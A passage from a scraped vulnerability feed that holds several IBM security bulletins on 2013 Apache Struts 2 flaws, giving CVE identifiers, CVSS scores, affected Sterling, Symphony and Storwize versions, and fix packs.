when invoking a redirect.\n\nCVSS Base Score: 6.8 \nCVSS Temporal Score: See 
[_https://exchange.xforce.ibmcloud.com/vulnerabilities/85573_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nSterling Order Management 8.5 \nIBM Sterling Selling and Fulfillment Foundation 9.0 \nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Field Sales 9.0 \nIBM Sterling Field Sales 9.1.0 \nIBM Sterling Field Sales 9.2.0 \nIBM Sterling Field Sales 9.2.1\n\n## Remediation/Fixes\n\nThe recommended solution is to apply two fix packs sequentially, the security fix pack (SFP) and then followed by the fix pack (FP) as soon as practical. Please see below for information about the available fixes. \n \n \n\n\n**_Product_**| **_Security Fix Pack*_**| **_Fix Pack*_**| **_How to acquire fix_** \n---|---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1-SFP1_**| **_9.2.1-FP7_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP1_**| **_9.2.0-FP29_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP1_**| **_9.1.0-FP57_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.0.0| **_9.0.0- SFP1_**| **_9.0.0-FP82_**| **_[https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>)_** \nSterling Order Management 8.5| **_8.5- SFP1_**| **_8.5-HF103_**| 
**_[https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>)_** \nIBM Sterling Field Sales 9.0| **_SFS9.0-SFP1_**| **_SFS9.0-HF6_**| **_[https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>)_** \nIBM Sterling Field Sales 9.1.0| **_SFS9.1.0-_** **_SFP1_**| **_SFS9.1.0-FP15_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF_** \nIBM Sterling Field Sales 9.2.0| **_SFS9.2.0- SFP1_**| **_SFS9.2.0-FP4_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF_** \nIBM Sterling Field Sales 9.2.1| **_SFS9.2.1- SFP1_**| **_SFS9.2.1-FP2_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF_** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T19:34:59", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management and IBM Sterling Configure, Price, Quote are affected by multiple Apache Struts 2 security vulnerabilities.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316"], "modified": "2018-06-16T19:34:59", "id": "D68D8E96CFEEA20788D774DC41555B0BE3390F1E2DFCA1C7093ABC2ACCB666A8", "href": "https://www.ibm.com/support/pages/node/237901", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:52:59", "description": "## Summary\n\nIBM Sterling Web Channel use Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2013-4310_](<https://vulners.com/cve/CVE-2013-4310>)\n\n**Description:** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system. \n \nCVSS Base Score: 5.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/87336_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n\nCVEID: [_CVE-2013-4316_](<https://vulners.com/cve/CVE-2013-4316>)\n\n**Description:** \nAn unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. 
\n\nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/87373_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\nCVEID: [_CVE-2013-2251_](<https://vulners.com/cve/CVE-2013-2251>)\n\n**Description:** \nApache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85756_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n \n_ \n_CVEID: [_CVE-2013-2248_](<https://vulners.com/cve/CVE-2013-2248>)\n\n**Description:** \nApache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. 
An attacker could exploit this vulnerability using the redirect: and redirectAction: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites.\n\nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85755_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n \n_ \n_CVEID: [_CVE-2013-2135_](<https://vulners.com/cve/CVE-2013-2135>)\n\n**Description:** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by a double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system.\n\nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84763_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n \n_ \n_CVEID: [_CVE-2013-2134_](<https://vulners.com/cve/CVE-2013-2134>)\n\n**Description:** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by a double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. 
\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84762_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-2115_](<https://vulners.com/cve/CVE-2013-2115>)\n\n**Description:** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system.\n\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84543_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-1966_](<https://vulners.com/cve/CVE-2013-1966>)\n\n**Description:** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system.\n\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84542_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n \n_ \n_CVEID: [_CVE-2013-1965_](<https://vulners.com/cve/CVE-2013-1965>)\n\n**Description:** \nApache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. 
An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system.\n\nCVSS Base Score: 6.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85573_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nSterling Web Channel 9.0 \nSterling Web Channel 9.1\n\n## Remediation/Fixes\n\nThe recommended solution is to apply two fix packs sequentially, the security fix pack (SFP) and then followed by the fix pack (FP) as soon as practical. Please see below for information about the available fixes. \n \n \n\n\n**_Product_**| **_Security Fix Pack*_**| **_Fix Pack*_**| **_How to acquire fix_** \n---|---|---|--- \nSterling Web Channel| **_9.0.0-SFP1_**| **_9.0.0-FP5_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF_** \nSterling Web Channel| **_9.1.0- SFP1_**| **_9.1.0-FP2_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNONE\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T19:37:44", "type": "ibm", "title": "Security Bulletin:Sterling Web Channel is affected by Apache Struts 2 security vulnerabilities (CVE-2013-4310, CVE-2013-4316, CVE-2013-2251, CVE-2013-2248, CVE-2013-2135, CVE-2013-2134, CVE-2013-2115, CVE-2013-1966, CVE-2013-1965)", "bulletinFamily": "software", 
"cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316"], "modified": "2018-06-16T19:37:44", "id": "98B23F6FBC89B642E5DC206D9014376ABD6C0435129FB8C81177F33D5AEBB6C3", "href": "https://www.ibm.com/support/pages/node/511555", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:53:56", "description": "## Summary\n\nThis bulletin relates to several security vulnerabilities that have been reported against Apache Struts 2 through October 2013. IBM Platform Symphony includes a version of Struts 2 that is vulnerable to these issues. \n\n## Vulnerability Details\n\nSeveral security vulnerabilities have been reported against Apache Struts 2 through October 2013. IBM Platform Symphony\u2019s PMC GUI uses Struts 2 as a framework for Java web applications. A version of the package that is vulnerable to these issues is included in several past versions of IBM Platform Symphony. The latest versions of Struts 2 address all the vulnerabilities and can be applied through the fix detailed in the Remediation section. \n \n \n[**_CVE-2013-4310_**](<https://vulners.com/cve/CVE-2013-4310>) \n \n**Description:** \n \nApache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix. 
\n \nCVSS Base Score: 5.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/87336_](<http://xforce.iss.net/xforce/xfdb/87336>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n[**_CVE-2013-2251_**](<https://vulners.com/cve/CVE-2013-2251>) \n \n**Description:** \n \nApache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85756_](<http://xforce.iss.net/xforce/xfdb/85756%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n \n[**_CVE-2013-2248_**](<https://vulners.com/cve/CVE-2013-2248>)** ** \n \n**Description:** \n \nMultiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix. \n \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85755_](<http://xforce.iss.net/xforce/xfdb/85755%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n[**_CVE-2013-2135_**](<https://vulners.com/cve/CVE-2013-2135>)** ** \n \n**Description:** \n \nApache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both \"${}\" and \"%{}\" sequences, which causes the OGNL code to be evaluated twice. 
\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84763_](<http://xforce.iss.net/xforce/xfdb/84763%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[**_CVE-2013-2134_**](<https://vulners.com/cve/CVE-2013-2134>) \n \n**Description:** \n \nApache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84762_](<http://xforce.iss.net/xforce/xfdb/84762%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[**_CVE-2013-2115_**](<https://vulners.com/cve/CVE-2013-2115>) \n \n**Description:** \n \nApache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84543_](<http://xforce.iss.net/xforce/xfdb/84543%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[**_CVE-2013-1966_**](<https://vulners.com/cve/CVE-2013-1966>) \n \n**Description:** \n \nApache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. 
\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84542_](<http://xforce.iss.net/xforce/xfdb/84542%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[**_CVE-2013-1965_**](<https://vulners.com/cve/CVE-2013-1965>) \n \n**Description:** \n \nApache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect. \n \nCVSS Base Score: 6.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85573_](<http://xforce.iss.net/xforce/xfdb/85573%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n \n \n**AFFECTED PRODUCTS AND VERSIONS: ** \nIBM Platform Symphony 5.2 and 6.1.x \n \n \n**REMEDIATION: ** \n \nWe strongly recommend that you apply the following fix from FixCentral to avoid this potential security exposure. 
\n \n \n\n\n_Product_| _VRMF_| _Fix ID_ \n---|---|--- \n_IBM Platform Symphony_| _5.2_| sym-5.2-build224587 \n_IBM Platform Symphony_| _6.1.0.1_| sym-6.1.0.1-build224587 \nsym-6.1.0.1-build226780 \n_IBM Platform Symphony_| _6.1.1_| sym-6.1.1-build224587 \nsym-6.1.1-build226780 \n \n \n \n**_Workaround(s) & Mitigation(s):_** \nNone \n \n \n \n**REFERENCES: ** \n[](<https://www-304.ibm.com/support/docview.wss?uid=swg21496117&wv=1>)[\u00b7 __Complete CVSS Guide__](<http://www.first.org/cvss/v2/guide>) \n[\u00b7 __On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)_ _ \n \n \n \n**RELATED INFORMATION: ** \n[_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>)[_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>) \n \n**ACKNOWLEDGEMENT** \nNone \n \n**CHANGE HISTORY** \n20 December, 2013 Original Copy Published \n \n \n\n\n_*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash. _\n\n \n**_Note: _**_According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY._\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:24:24", "type": "ibm", "title": "Security Bulletin: IBM Platform Symphony (CVE-2013-2251 CVE-2013-2248 CVE-2013-2135 CVE-2013-2134 CVE-2013-2115 CVE-2013-1966 CVE-2013-1965 CVE-2013-4310)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310"], "modified": "2018-06-18T01:24:24", "id": "64DB3E655F72A48F214A03210C6CABBA2AF9FDD7CFBEC664636D3A72117B8C35", "href": "https://www.ibm.com/support/pages/node/678537", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T07:02:27", "description": "## Summary\n\nSecurity Bulletin: Unauthorized access exposure on IBM SAN Volume Controller and Storwize Family (CVE-2013-2251 CVE-2013-2248 CVE-2013-2135 CVE-2013-2134 CVE-2013-2115 CVE-2013-1966 CVE-2013-1965)\n\n## Vulnerability Details\n\n## Security Bulletin \n \n--- \n \nSummary \n--- \n 
\nAdministrative access to the system via the IP interface may be obtained without authentication.\n\n## Vulnerability Details \n \n--- \n \n**CVEID:** CVE-2013-2251 CVE-2013-2248 CVE-2013-2135 CVE-2013-2134 CVE-2013-2115 CVE-2013-1966 CVE-2013-1965\n\n**DESCRIPTION: \n \n** The vulnerabilities can be exploited by a user with access to the system's management IP interface using vulnerabilities in the Apache Struts component. If successful, the user can gain access with superuser privilege which will allow any modification to the configuration, including complete deletion.\n\n[_CVE-2013-2251_](<https://vulners.com/cve/CVE-2013-2251>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85756_](<http://xforce.iss.net/xforce/xfdb/85756>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-2248_](<https://vulners.com/cve/CVE-2013-2248>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85755_](<http://xforce.iss.net/xforce/xfdb/85755>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n_ \n_[_CVE-2013-2135_](<https://vulners.com/cve/CVE-2013-2135>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84763_](<http://xforce.iss.net/xforce/xfdb/84763>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-2134_](<https://vulners.com/cve/CVE-2013-2134>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84762_](<http://xforce.iss.net/xforce/xfdb/84762%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-2115_](<https://vulners.com/cve/CVE-2013-2115>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See 
[_http://xforce.iss.net/xforce/xfdb/84543_](<http://xforce.iss.net/xforce/xfdb/84543%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-1966_](<https://vulners.com/cve/CVE-2013-1966>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84542_](<http://xforce.iss.net/xforce/xfdb/84542>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-1965_](<https://vulners.com/cve/CVE-2013-1965>) \nCVSS Base Score: 6.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85573_](<http://xforce.iss.net/xforce/xfdb/85573>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions \n \n--- \n \nIBM SAN Volume Controller \nStorwize V7000 for Lenovo \nStorwize V5000 for Lenovo \nStorwize V3700 for Lenovo \nStorwize V3500 for Lenovo \n \nAll products affected when running a version below V6.4.1.7 or V7.1.0.5.\n\n## Remediation/Fixes \n \n--- \n \nFor IBM SAN Volume Controller, Storwize V7000, V5000, V3700 and V3500 for Lenovo and IBM Flex System V7000, install the V6.4.1.7 or V7.1.0.5 PTF level or higher.\n\n## Workarounds and Mitigations \n \n--- \n \nAccess to the system's IP interface can be restricted, for example using a private network or firewall technology. 
Only users with access to the IP interface can exploit the vulnerability.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Unauthorized access exposure on IBM SAN Volume Controller and Storwize Family (CVE-2013-2251, CVE-2013-2248 CVE-2013-2135, CVE-2013-2134, CVE-2013-2115, CVE-2013-1966 and CVE-2013-1965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251"], "modified": "2023-03-29T01:48:02", "id": "7F8F02D6D093C8CE68EF519749184D5E3DA2F0A4FC5E9A8C45DADD8885AA6579", "href": "https://www.ibm.com/support/pages/node/866008", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T05:56:14", "description": "## Abstract\n\nAdministrative access to the system via the IP interface may be obtained without authentication.\n\n## Content\n\n**VULNERABILITY DETAILS: ** \n \n \n**CVEID: **CVE-2013-2251 CVE-2013-2248 CVE-2013-2135 CVE-2013-2134 CVE-2013-2115 CVE-2013-1966 CVE-2013-1965** ** \n \n \n**DESCRIPTION: 
** \n \nThe vulnerabilities can be exploited by a user with access to the system's management IP interface using vulnerabilities in the Apache Struts component. If successful, the user can gain access with superuser privilege which will allow any modification to the configuration, including complete deletion. \n_ \n_[_CVE-2013-2251_](<https://vulners.com/cve/CVE-2013-2251>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85756_](<http://xforce.iss.net/xforce/xfdb/85756>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_[_CVE-2013-2248_](<https://vulners.com/cve/CVE-2013-2248>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85755_](<http://xforce.iss.net/xforce/xfdb/85755>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n_ \n_[_CVE-2013-2135_](<https://vulners.com/cve/CVE-2013-2135>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84763_](<http://xforce.iss.net/xforce/xfdb/84763>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ 